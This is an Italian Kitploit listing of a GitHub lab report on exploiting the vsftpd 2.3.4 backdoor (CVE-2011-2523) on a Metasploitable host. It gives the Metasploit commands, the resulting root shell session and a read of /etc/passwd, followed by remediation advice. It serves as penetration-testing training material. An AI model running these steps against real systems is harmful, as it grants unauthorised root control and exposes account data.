Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
vsftpd-234-vuln-report — Valutazione delle vulnerabilità e sfruttamento di vsftpd 2.3.4 (CVE-2011-2523) tramite Metasploit. Report completo e prova dell'accesso root inclusi. | Kitploit
Strumenti/GitHubGitHub/vedpakhare/vsftpd-234-vuln-report
Framework di ExploitAnalisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneSviluppo Payload
GitHubvedpakhare/vsftpd-234-vuln-report

vsftpd-234-vuln-report

Valutazione delle vulnerabilità e sfruttamento di vsftpd 2.3.4 (CVE-2011-2523) tramite Metasploit. Report completo e prova dell'accesso root inclusi.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi RepositorySito web
21 anno faNon ancora revisionato

💥 Report sull'Exploit del Backdoor vsftpd 2.3.4

Sfruttamento di una vulnerabilità nota in vsftpd 2.3.4 tramite Metasploit.

📌 Dettagli del Target

  • IP del Target: 192.168.150.133
  • Servizio: FTP
  • Versione Vulnerabile: vsftpd 2.3.4
  • Modulo Exploit: exploit/unix/ftp/vsftpd_234_backdoor
  • Payload: Shell di comando (TCP)

🔍 Riepilogo della Vulnerabilità

vsftpd 2.3.4 contiene una backdoor malevola che apre una shell di comando sulla porta 6200 quando viene ricevuto un nome utente appositamente costruito (che termina con :)).

CVE: CVE-2011-2523


🚀 Passaggi di Sfruttamento

root@kitploit:~
use exploit/unix/ftp/vsftpd_234_backdoor
set RHOSTS 192.168.150.133
run

💥 Accesso alla Shell Ottenuto:

root@kitploit:~
whoami
> root

id
> uid=0(root) gid=0(root)

hostname
> metasploitable

uname -a
> Linux metasploitable 2.6.24-16-server #1 SMP ...

cat /etc/passwd
> root:x:0:0:root:/root:/bin/bash
  daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  ...

🔐 Impatto

L'accesso alla shell di root conferisce all'attaccante il pieno controllo del sistema target, inclusi escalation dei privilegi, movimento laterale, esfiltrazione dei dati e accesso persistente.


✅ Raccomandazioni

  • Non utilizzare vsftpd 2.3.4.
  • Aggiorna a una versione sicura e supportata.
  • Limita l'accesso esterno a FTP.
  • Monitora il traffico sospetto sulla porta 6200.

📄 Report

📝 Report PDF completo disponibile in questo repository: vsftpd-exploit-report.pdf


📚 Riferimenti

  • Rapid7 Module Info
  • CVE-2011-2523 - NVD

👨‍💻 Autore

Creato con 🔥 da vedpakhare

Scarica lo strumento